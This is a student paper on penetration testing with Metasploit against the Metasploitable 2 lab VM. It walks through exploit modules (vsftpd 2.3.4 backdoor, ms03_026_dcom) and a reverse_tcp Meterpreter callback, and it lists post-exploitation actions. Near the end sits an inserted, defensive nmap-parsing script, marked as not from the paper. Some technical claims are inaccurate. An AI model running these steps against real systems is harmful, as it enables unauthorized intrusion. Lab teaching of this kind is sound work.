Source: ResearchGate, https://www.researchgate.net/publication/318710609 (Article, April 2017; author Michael Moore, Jackson State University; uploaded by the author on 26 July 2017).

Penetration Testing and Metasploit

Michael D. Moore
Computer Science Department
Jackson State University
Jackson, MS USA
dustan26@live.com

Abstract—In this paper, penetration testing in general is discussed, as well as how to penetration test using Metasploit on Metasploitable 2. Metasploitable 2 is a deliberately vulnerable system that I chose to use, since doing this on any other system would be considered hacking and could have bad consequences. The main purpose of the research is to show the various tools used when trying to find vulnerabilities in a system. By using Metasploit to test a system, we can find the vulnerabilities that need to be fixed in order to better protect the system. Areas such as network protocols, firewalls, and basic security issues are explored in this research.

While there are many different ways to do penetration testing, I have chosen to use Metasploit because of its broad range of uses and its simplicity. We have the option of either using the community version of the product, which is mostly automated, or using the command line within Metasploit. Both of these options are explored in this paper. Alongside the tools used in Metasploit, I show how to effectively find the vulnerabilities within a system of your choice. After going through all of the steps in this paper, anyone should be able to try to exploit any system they feel is vulnerable.

Keywords— vulnerabilities, Stuxnet, penetration testing, Metasploit, Metasploitable 2, pen-testing, exploits, Nmap, and Kali Linux.

I. INTRODUCTION

At the very beginning of the Internet, the world had it easy in terms of security. Not many people had access to the Internet, so there were fewer attackers to deal with. Security wasn't very important back then, but as the years moved on the Internet grew very big very fast, and we have been playing catch-up ever since.

With new technology being made every year, we constantly have to come up with new ways to stop malicious activity within our systems. Not only do businesses need constant upkeep in security, but home professionals do as well, especially when dealing with servers. Security is very important in our everyday lives. When people say they want security, what they usually mean is that they want a sense of security. It makes sense if you think about it: feeling secure isn't necessarily the same thing as being secure. If everyone understood what kinds of dangers are out there, they would make real security their first priority.

Given the right environment and opportunity, anyone could use the skills they learn with programs like Metasploit to stop the malicious behavior of others. When people set out to build computer systems, they don't initially consider every possible exploit available within them. There are a lot of moving parts when it comes to building a system, and it's everyone's job to explore all the options they have in order to provide a secure and safe system. This is where penetration testing tools come in handy.

When it comes to the security of computer systems, we can never leave anything to chance. All it takes is one hacker exploiting a system to gain access to the personal and private data of its users and operators. By using the testing techniques described in this paper, people can get a jump on the bad guys looking to harm and infiltrate systems that do not belong to them.

The material in this paper is only to be used in an appropriate manner and is in no way intended to lead one to become a hacker. The methods described are meant to help someone who intends to learn penetration testing of their own system or of a system they have permission to test.

Far too many people take what they are learning and apply it in an unethical way, creating havoc for monetary gain. No one should take what they learn and use it against anyone in that manner.

II. PENETRATION TESTING

Penetration testing encapsulates many different things, including Wi-Fi, networks, software, and hardware systems. Most systems have some form of vulnerability present when launched. These vulnerabilities are known as zero-day exploits. Zero-day exploits are usually either known to the company, which does not think they are bad enough to fix, or not known to the company at all. There are many issues with the interactions between software and hardware that can remain unknown for years before they are found, and some are never found because the issue has not presented itself.

Penetration testing can be defined as a means for a company or business to assess the vulnerabilities within its system at any given time. As systems change, such as through the addition of new software or hardware, more vulnerabilities can present themselves. The best way to stop these vulnerabilities from being found by others is either to hire someone full-time to constantly do penetration testing or, if money is tight, to hire someone occasionally to do the testing.

Although penetration testing by professionals might not find every vulnerability in the system, it's still necessary to make every effort possible against people who might try to test the system maliciously. Among the many reasons for doing penetration testing are financial responsibilities, security issues, and information protection[2]. If you were to do penetration testing on a system that is not yours, you should definitely make sure you get a right-to-hack and nondisclosure agreement signed[2].

When it comes to protecting computer systems, Metasploit is a good way to do that. Metasploit is only one of many penetration testing programs available. By using this program, you will be able to quickly identify vulnerabilities through exploitation of the system, either manually (command-line style) or automatically (secure web-based GUI).

There are many different penetration testing tools available to explore. Metasploit, Kali Linux, Wireshark, w3af, John the Ripper, Nessus, Nmap, Dradis, and BeEF are a few of them[1]. Some of the various types of attacks that can be done on a system include Bluetooth, PC microphone, Wi-Fi (WPA-protected), and man-in-the-middle attacks[1]. Kali Linux is an operating system filled with various open source programs developed strictly with the hacker world in mind. It's not an operating system to be taken lightly, as any illegal use of it could get you jailed if you were ever caught. The two main types of penetration testing are overt and covert[5]. Overt testing is when you have the complete cooperation of the owners of the systems you are testing, and covert testing is when you are basically testing the staff's ability to figure out the exploits being done on the system[5].

Another thing to consider when running a business is the financial aspect. There are a lot of companies out there that are being crippled due to lack of testing or preparation. Sometimes the cause is trying to get the product out before it is ready. If that is the case, one might consider giving the project another few weeks in order to make sure the bugs are all worked out, because putting software out into the world before it's ready could result in catastrophic failure.

As companies grow bigger over the years, we owe it to ourselves to conduct testing on all of our systems in order to show our products at their finest and not have to worry about possible zero-day exploits that have been left behind. Shown below is one person's estimated damage report due to cyber crimes that could have been prevented if maintenance on the systems had been done.

Figure: estimated damage report due to cyber crimes. Source[2].

III. METASPLOITABLE 2

Metasploitable 2 is the system used in this research. It is a Linux-based OS made specifically with Metasploit in mind, to be exploited by its users. It is available to download on the Metasploit website for anyone who wishes to use it to do penetration testing. Although I could use any penetration testing program I wish, I will be using Metasploit, as discussed previously.

In order to set up the vulnerable machine, you need to download it from the website (www.metasploit.com) and open the virtual machine file in the virtualization software of your choice. After these steps, you are on your way to testing the vulnerabilities of this system and on your way to becoming a penetration tester. All you then need to do is enter msfadmin for the username and password, and you will be connected shortly. Even though this is just a test system, it has all the capabilities of any operating system one would wish to test in the future.
A. METHODS AND METHODOLOGIES

Some of the methods and methodologies being used include the Open Web Application Security Project and the Open Source Security Testing Methodology Manual[8]. Not all methods need to be used for every application; some are only designed to be used for certain things. These methods are still integrated into today's standards. The Open Source Security Testing Methodology Manual can be used in areas like physical security, human factors, wireless communication, telecommunication, data networks, and operating systems[8]. Using something like Kali Linux can serve many purposes, such as SQL injection, database security audits, network traffic eavesdropping/tampering, network infrastructure attacks, network stress testing, denial of service attacks, manipulation of user data, and web application testing[8].

IV. AUTOMATED AND MANUAL TESTING

There are differences between automated and manual testing. With automated testing, you might not necessarily understand how everything works or why it's happening. If you use manual testing, you have much more control over what happens in the process and are able to learn all the ways the systems work together. Without getting into the financial difference between the two, the manual method seems to be the best way to do penetration testing.

One thing to consider when choosing between manual and automatic testing is the time frame it takes to do the job. While both ways have their benefits, the time it takes is much shorter when penetration testing automatically[2]. With automated penetration testing, the code used to attack covers various platforms[2]. When doing it manually, you have to change the code every time you execute it to cover all the different platforms[2]. Unless you are a seasoned professional, you should leave manual penetration testing to the pros[2]. "Experienced hackers are used to writing own scripts or even automate one of the stages, in order to proceed quickly and find more security leaks in target systems[2]."

V. METASPLOIT ON STUXNET

While there are a lot of uses for Metasploit, one of the best-known applications of it is its use on Stuxnet. The Stuxnet worm was used against programmable logic controllers and exploited zero-day vulnerabilities in Windows[13]. It was used against the "Iranian nuclear facilities" in 2010[13]. Rahat Masood et al. used Metasploit against Stuxnet. They exploited three different vulnerabilities within Stuxnet: the server service, the print spooler, and the .LNK vulnerability[13].

Stuxnet was one of the biggest debacles of recent years, and if it is not learned from, it will be used in future events aimed at security issues. There are tons of PLCs around the world, and to think that a worm like this one can affect any network in this way is very scary. "There are two main phases of Stuxnet worm: first is 'propagation phase' which is the characteristic of each worm and second one is 'injection phase'. In first phase, Stuxnet worm propagates in local area network and update its files through peer to peer communication. In second phase when it finds its actual target i-e Siemens WinCC control and monitoring system connected to PLC it starts functioning and deviates them from their normal behavior[13]."

Figure 2: Screenshot of Metasploit Pro Console.

VI. PENETRATION TESTING USING METASPLOIT

Before you download and use Metasploit, you need to make sure your PC can handle all of the following requirements[6]:

● At least 2 GHz processor
● 2 GB RAM (recommended: 4 GB)
● At least 500 MB hard drive space
● 10/100 Mbps network interface card
● Windows XP through current Windows OS
● Ubuntu 8 through current
● Firefox 4 through current
● Chrome 10 through current
● IE 9 through current
Metasploit has a wide array of ways to do penetration testing. One way is using the community online version, which is automatic, and the other is to use the console version, which is similar to a command prompt and is considered manual. The company that made Metasploit (Rapid7) has made lots of other programs to help you along the way, such as AppSpider, InsightIDR, InsightVM, and Logentries. There are many ways to access Metasploit. "Msfconsole is another interface available for Metasploit interaction. Compared to Msfcli, Msfconsole is more robust, scalable, and easier to use[8]."

One of the very first things that needs to be done when trying to test a particular system is to either know the IP or be able to locate the IPs of the systems remotely. Depending on which systems you are using, you need different command-line entries to get that information[9]. You can use things such as SNMP or NetBIOS to find the IP addresses[9]. If you are using a Linux-based system, you could probably use the arp-scan command followed by your IP to scan for all of the IP addresses associated with your local area network[9]. Some of these methods could take up to 15 hours, so make sure you have some time on your hands[9].

Meterpreter is another part of Metasploit that gets used quite a bit to exploit systems. By using Meterpreter to deliver the exploit and gain access to its shell, you can perform a lot of different actions there. Some of them include token stealing, dumping hashes, creating users, service control, routing table alteration, taking screenshots, executing commands, deleting event logs, mouse control, editing/deleting files, and uploading files[8].

There are a lot of other programs that intertwine with Metasploit to help with penetration testing. Nessus 5 provides lots of other options within the msfconsole[11]. First, you need to download Nessus and configure it however you wish to use it[11]. Select any plugins you need for your journey and log in to the msfconsole[11]. Then, you will need to enter the command load nessus and you are on your way to Nessus usage[11].

Some of the basic commands when you are in the Metasploit console are:

● help (brings up some of the basic commands)[10].
● back (allows you to go back to the msf> prompt)[10].
● set LHOST (sets YOUR listening host)[10].
● set RHOST (sets the ATTACK host)[10].
● show exploits (shows all of the exploits currently available in Metasploit for any situation)[10].
● search (exploit name) (allows you to find a specific exploit to get info about)[10].
● info (exploit name) (gets info about a specific exploit so you can decide whether or not you want to use it)[10].
● show payloads (lets you see all the available payloads for that specific exploit and shows which one is preferred)[10].
● info (payload) (shows info on the selected payload)[10].
● set PAYLOAD (sets the payload to the selected one); show options (shows all the options that need to be set in order to run the exploit)[10].
● show targets (shows targets)[10].
● set target (sets the target)[10].
● run or exploit (performs the payload launch on the current target and, if successful, gains shell entry into the attacked system)[10].

Figure 1: Some other important commands. Source[6].

Figure 1: Here is some sample console output that shows some uses of the aforementioned commands. Source[5].

```
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file...
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >
```

There are a lot of hacking contests that people set up for their friends in the hacking community using Metasploit's built-in programs, but in the Kali OS. As we have seen, Nmap and other programs can be used in multiple systems and frameworks. In the article titled "Hack the Fartknocker VM (CTF Challenge)," they talk about port hacking and finding hidden messages in files found along the way[12]. There are a lot of different avenues used in the article, like SSH, FTP, and port hacking. Wireshark was used to help along the way. Below I have shown the fun side of the hacking world with a screenshot of what the person who set up the challenge left for the person who was able to hack the VM.

A. Manual Penetration Testing

One of the ways to do penetration testing is manually. By using a command-line-like console, users are able to have full control over their exploitation. Scripts are written by some professionals in order to automate the process of exploiting vulnerabilities. Not all scripts are the same, as the systems being exploited are different and sometimes require different methods. First the user has to gain access to the system in order to push a payload, which will fight to gain control of the current system.

Scripting languages are just one of the many ways to automate all of the footwork required to do the job. "A script based attack framework is a type of web attack program written in scripting language[3]." Without scripting it would take a lot longer to try exploits that require many steps but aren't guaranteed success.

Figure 1: Flowchart for generic path used to exploit using Metasploit.

Figure 2: Script Attack on a Particular System. Source[3].

Figure 3: A basic depiction of how Metasploit is used in reference to penetration testing and vulnerability detection.

The figure below is a script that will deliver a payload to the system you wish to exploit[3].

```
# Pseudocode skeleton of a Metasploit exploit script as given in [3];
# probing_ver, prepare_payload4/5, get_target_ret, payload_length, shellcode
# and socket are the paper's placeholder names, not real API calls.
exploit_def()
  connection()
  exploit_preamble = "\x00\x00\x01"
  version_find = probing_ver()
  if version_find == 5
    attack_payload = prepare_payload5()
  else
    attack_payload = prepare_payload4()
  end
  exploit_preamble << payload_length
  socket.put(exploit_preamble)      # required by the protocol
  socket.get_once()
  socket.put(attack_payload)        # sending the attack payload
  socket.get_once()
  ...                               # triggering vulnerability
end

def prepare_payload5()
  attack_payload = shellcode
  attack_payload << rand_alpha(payload.length)   # random filler
  attack_payload << "\x010" + [-117].pack("X")
  attack_payload << "\xe\xf"
  attack_payload << get_target_ret(5)            # target version: 5
  attack_payload << rand_alpha(409)
  return attack_payload
end
```

Figure 3: Code Snippet from a Metasploit Script. Source: [3].

B. Metasploit Framework Console

Here is where the good stuff starts. These are some of the basics of how to access the console to do some manual exploitation of systems. This process shows one example of an exploit of a certain system, not necessarily Metasploitable 2.

1. One of the first steps is to open the console itself and enter msfadmin for the username and the password[4].
2. Next, you need to figure out what system and exploit you wish to use[4].
3. Once you have that figured out and have the IP address of the system, you enter nmap and then the IP address. The console maps the ports of the system to see which ports are open[4].
4. With the open port in hand, we enter show commands and find an exploit in the list that deals with remote PC[4].
5. "To get more information regarding the exploit you can use the command, 'info exploit/windows/dcerpc/ms03_026_dcom'[4]".
6. Then, we need to enter use followed by the exploit name into the console[4].
7. Once that's finished loading, we need to enter show options to find out what to do next to get the exploit going further[4].
8. Next, we need to enter the IP address (set RHOST "ip address") we wish to exploit, and find the payload to push onto the open port[4].
9. We need to enter show payloads to find compatible payloads for this exploit[4].
10. "set PAYLOAD windows/meterpreter/reverse_tcp" needs to be entered now into the console and then "set LHOST 192.168.42.128"[4].
11. Now enter the check command to see if the "machine vulnerable to the exploit or not", and if not just move on with the command exploit to perform the exploit[4].
12. If everything works like it's supposed to, you should gain access to the system and be able to do anything you want on the system.

C. Metasploit Community

This version is a lot simpler to use since it is automated. When you download Metasploit, it comes with this option, which runs in your browser using your computer as the local host that does all of the exploiting. Metasploit Community was mainly created to help bridge the gap between everyday penetration testers and people looking to do the testing without really understanding every aspect of it. Although using the Community edition seems faster, you still need to read up on all of the different techniques to be efficient at the testing.

1. To access the web-based GUI, you need to find where you installed Metasploit and select the GUI from the list of files. It will open in your web browser.
2. The next step is to enter the login information you provided at the time you did the setup for Metasploit.
3. Click the open project tab to start a new project to keep track of the different things you are going to be doing with Metasploit, since not every system is vulnerable in the same manner.
4. You can now scan for available systems to try to exploit, or enter the IP address to get started.
5. With the system entered, you can analyze the system for available exploits and also push the payloads automatically onto the systems.
6. After those steps, all that's left to do is capture the information and finish gaining access to the exploitable system.
7. Just like with the manual version, after gaining access, you have free roam on the system you now control.

D. Common Exploits Known

1. VSFTP Backdoor: This exploit allows the user to gain access to the shell via a backdoor that was made in 2011 and removed shortly thereafter.
2. MS08-067: This vulnerability relates to remote PC entry given that a certain request is entered[5].

VSFTP Backdoor instructions[7]:

1. Log in to the msf console.
2. Find your IP address.
3. Obtain the IP address of the Metasploitable 2 machine or whatever system you are exploiting.
4. Next, enter nmap -sS -sV -O (Metasploitable 2 IP address). This will provide you with everything you can know about the ports on that particular system.
5. Enter "search vsftp"[7].
6. Enter "use exploit/unix/ftp/vsftpd_234_backdoor"[7].
7. Enter "show options"[7].
8. Enter "set RHOST IPAddressOfMachineExploiting"[7].
9. Finally, enter "exploit".

Figure 4: Screenshot of VSFTPD Backdoor exploit in action.
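The nmap step in the VSFTP backdoor instructions above, together with the IP-discovery discussion in section VI, is also where a defender gets the facts they need. The following is an added example, not code from the paper or from any of its sources: it parses a constructed nmap -sS -sV -O report for a Metasploitable 2 style lab VM, checks that the scanned host falls inside the engagement's authorized CIDR ranges (an assumed scope list), and flags the vsftpd 2.3.4 banner that the paper's exploit module targets as a host in need of an upgrade.

```python
"""Audit an nmap -sS -sV -O report for a lab host (example code, not from the paper)."""
import ipaddress
import re

# Constructed sample shaped like nmap's normal output for a Metasploitable 2
# style VM; the IP address, MAC and the non-vsftpd version strings are made up.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.42.129
Host is up (0.00045s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet  Linux telnetd
80/tcp   open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
MAC Address: 08:00:27:AA:BB:CC (Oracle VirtualBox virtual NIC)
"""

# Service version the paper's walkthrough exploits, mapped to the Metasploit
# module it names. A defender reads this table the other way round: any host
# still advertising this banner needs an upgrade, not an exploit.
KNOWN_VULNERABLE = {
    "vsftpd 2.3.4": "exploit/unix/ftp/vsftpd_234_backdoor (vsftpd 2.3.4 backdoor, 2011)",
}

HOST_LINE = re.compile(r"^Nmap scan report for (?:.*\()?(\d+\.\d+\.\d+\.\d+)\)?")
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)


def parse_nmap_output(text):
    """Return (host_ip, {port: (proto, state, service, version)})."""
    host = None
    ports = {}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            version = (m.group("version") or "").strip()
            ports[int(m.group("port"))] = (
                m.group("proto"), m.group("state"), m.group("service"), version)
    return host, ports


def in_scope(ip, authorized_ranges):
    """True if ip lies inside one of the CIDR ranges the engagement permits."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(r, strict=False) for r in authorized_ranges)


def find_known_vulnerable(ports, catalog=KNOWN_VULNERABLE):
    """Open ports whose version banner starts with a catalogued vulnerable version."""
    findings = []
    for port, (proto, state, service, version) in sorted(ports.items()):
        if state != "open":
            continue
        for signature, note in catalog.items():
            if version.startswith(signature):
                findings.append({"port": port, "service": service,
                                 "version": version, "note": note})
    return findings


def audit_scan(text, authorized_ranges):
    """Tie the checks together; report nothing for a host outside the scope."""
    host, ports = parse_nmap_output(text)
    if host is None or not in_scope(host, authorized_ranges):
        return {"host": host, "in_scope": False, "open_ports": [], "findings": []}
    open_ports = [p for p, v in sorted(ports.items()) if v[1] == "open"]
    return {"host": host, "in_scope": True, "open_ports": open_ports,
            "findings": find_known_vulnerable(ports)}


if __name__ == "__main__":
    report = audit_scan(SAMPLE_NMAP_OUTPUT, ["192.168.42.0/24"])
    print(f"host {report['host']} in scope: {report['in_scope']}")
    print("open ports:", report["open_ports"])
    for f in report["findings"]:
        print(f"  {f['port']}/{f['service']} {f['version']} -> {f['note']}")
```

Feed it the saved output of a real scan of your own lab VM and extend KNOWN_VULNERABLE with the banners your patch policy cares about.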
VII. CONCLUSION

There are a lot of penetration testing programs out there, and Metasploit just happens to be the best one that I could think of to share with you. It has a lot of nice options, and you can use it either manually or automatically. Although the reasons for and against the two have already been shown throughout the paper, I'd like to reiterate a few things. By doing all the exploiting manually, you are able to control the way you try to exploit a given system; it just might take a little bit longer. Penetration testing is just one of the multiple ways to make sure the information on your systems is secure and not open to hacking. When you plan on doing penetration testing, I suggest you give Metasploit a shot, and you won't be disappointed. When looking into what programs are available across the Internet, there are a lot of different options to choose from. If you are not careful with any of these programs, you could land yourself in some serious trouble.

REFERENCES

[1] M. Denis, C. Zena, and T. Hayajneh, "Penetration testing: Concepts, attack methods, and defense strategies," 2016 IEEE Long Island Systems, Applications and Technology Conference (LISAT), 2016.
[2] Y. Stefinko, A. Piskozub, and R. Banakh, "Manual and automated penetration testing. Benefits and drawbacks. Modern tendency," 2016 13th International Conference on Modern Problems of Radio Engineering, Telecommunications and Computer Science (TCSET), 2016.
[3] H. Gupta and R. Kumar, "Protection against penetration attacks using Metasploit," 2015 4th International Conference on Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015.
[4] N. Talekar, "Penetration Testing with Metasploit Framework | www.SecurityXploded.com," SecurityXploded.com. [Online]. Available: http://securityxploded.com/penetration-testing-with-metasploit.php. [Accessed: 31-Mar-2017].
[5] D. Kennedy, Metasploit: The Penetration Tester's Guide. San Francisco, CA: No Starch Press, 2011.
[6] O., "Hack Like a Pro - Null Byte « Wonder How To," WonderHowTo. [Online]. Available: https://null-byte.wonderhowto.com/how-to/hack-like-a-pro/. [Accessed: 14-Apr-2017].
[7] "Metasploitable Project: Lesson 8: Exploiting VSFTPD 2.3.4." [Online]. Available: https://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson8/index.html. [Accessed: 14-Apr-2017].
[8] F. Holik, J. Horalek, O. Marik, S. Neradova, and S. Zitta, "Effective penetration testing with Metasploit framework and methodologies," 2014 IEEE 15th International Symposium on Computational Intelligence and Informatics (CINTI), 2014.
[9] "Finding IP Addresses of Other Network Interfaces on Linux," pentestmonkey. [Online]. Available: http://pentestmonkey.net/uncategorized/finding-ip-addresses-of-other-network-interfaces-on-linux. [Accessed: 17-Apr-2017].
[10] "How to use Metasploit commands for real-world security tests," SearchSecurity. [Online]. Available: http://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-security-tests. [Accessed: 15-Apr-2017].
[11] D. Dodd, "Penetration Testing and Shell Tossing with Meta... » ADMIN Magazine," ADMIN Magazine. [Online]. Available: http://www.admin-magazine.com/Articles/Pen-Test-Tips. [Accessed: 17-Apr-2017].
[12] "Hack the Fartknocker VM (CTF Challenge)," Hacking Articles, 06-Apr-2017. [Online]. Available: http://www.hackingarticles.in/hack-fartknocker-vm-ctf-challenge/. [Accessed: 18-Apr-2017].
[13] R. Masood, U.-E.-G., and Z. Anwar, "SWAM: Stuxnet Worm Analysis in Metasploit," 2011 Frontiers of Information Technology, 2011.